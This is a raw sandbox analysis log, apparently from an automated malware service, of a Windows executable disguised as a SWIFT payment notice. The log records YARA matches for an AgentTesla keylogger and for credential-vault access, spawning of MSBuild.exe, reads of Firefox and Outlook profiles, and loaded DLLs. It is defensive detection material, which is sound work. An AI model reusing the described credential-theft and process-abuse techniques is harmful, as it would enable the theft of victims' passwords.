Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_06239AE8	4_2_06239AE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_06238B87	4_2_06238B87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_06230040	4_2_06230040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0623A8B8	4_2_0623A8B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0623363B	4_2_0623363B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_06235D28	4_2_06235D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_06235000	4_2_06235000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_067F44B8	4_2_067F44B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_067FA8B8	4_2_067FA8B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_067FA8A7	4_2_067FA8A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0137D2D8	4_2_0137D2D8

Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7032 -s 1032

Source: EUR Swift Bildirimi12-08-2024.exe

Static PE information: No import functions for PE file found

Source: EUR Swift Bildirimi12-08-2024.exe, 00000000.00000000.2037247321.0000021D5D1F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePetpack.dll0 vs EUR Swift Bildirimi12-08-2024.exe
Source: EUR Swift Bildirimi12-08-2024.exe, 00000000.00000000.2037247321.0000021D5D1F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePocket.exe. vs EUR Swift Bildirimi12-08-2024.exe
Source: EUR Swift Bildirimi12-08-2024.exe, 00000000.00000002.2339874172.0000021D6F933000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamecef57186-8600-43f5-9c05-f8d076dd51f0.exe4 vs EUR Swift Bildirimi12-08-2024.exe
Source: EUR Swift Bildirimi12-08-2024.exe, 00000000.00000002.2339874172.0000021D6F933000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIlalapifafuqopesicaq6 vs EUR Swift Bildirimi12-08-2024.exe
Source: EUR Swift Bildirimi12-08-2024.exe, 00000000.00000002.2338172290.0000021D5D560000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamePetpack.dll0 vs EUR Swift Bildirimi12-08-2024.exe
Source: EUR Swift Bildirimi12-08-2024.exe, 00000000.00000002.2338417388.0000021D5EE71000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePetpack.dll0 vs EUR Swift Bildirimi12-08-2024.exe
Source: EUR Swift Bildirimi12-08-2024.exe	Binary or memory string: OriginalFilenamePetpack.dll0 vs EUR Swift Bildirimi12-08-2024.exe
Source: EUR Swift Bildirimi12-08-2024.exe	Binary or memory string: OriginalFilenamePocket.exe. vs EUR Swift Bildirimi12-08-2024.exe

Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload

Source: EUR Swift Bildirimi12-08-2024.exe, ------.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.raw.unpack, 4JJG6X.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.raw.unpack, 4JJG6X.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.raw.unpack, CqSP68Ir.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.raw.unpack, CqSP68Ir.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@9/5@1/1

Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7032
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4512:120:WilError_03

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\796d94f5-abc0-4687-9324-6dad01003d76

Jump to behavior

Source: EUR Swift Bildirimi12-08-2024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: EUR Swift Bildirimi12-08-2024.exe

Static file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: EUR Swift Bildirimi12-08-2024.exe	ReversingLabs: Detection: 63%
Source: EUR Swift Bildirimi12-08-2024.exe	Virustotal: Detection: 56%

Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe

File read: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe "C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe"
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7032 -s 1032
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: EUR Swift Bildirimi12-08-2024.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: EUR Swift Bildirimi12-08-2024.exe

Static file information: File size 2824749 > 1048576

Source: EUR Swift Bildirimi12-08-2024.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Windows.Forms.pdb source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Core.pdb2 source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: mscorlib.pdb source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.ni.pdbRSDS source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Drawing.pdb source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: mscorlib.ni.pdb source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Drawing.pdb8 source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Drawing.ni.pdb source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Core.pdb source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Windows.Forms.pdb; source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: mscorlib.pdbPM source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.pdbP source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.ni.pdb source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.pdb source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WEREE81.tmp.dmp.8.dr
Source:	Binary string: System.Core.ni.pdb source: WEREE81.tmp.dmp.8.dr

Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Code function: 0_2_00007FF848DA7F84 push ebx; retf	0_2_00007FF848DA7F97
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Code function: 0_2_00007FF848DA00BD pushad ; iretd	0_2_00007FF848DA00C1
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Code function: 0_2_00007FF848E90077 push esp; retf 4810h	0_2_00007FF848E90312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_067F44A8 push eax; iretd	4_2_067F44A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_067F4000 pushfd ; retf	4_2_067F4005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_067F1EC7 push es; retf	4_2_067F1EC8

Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
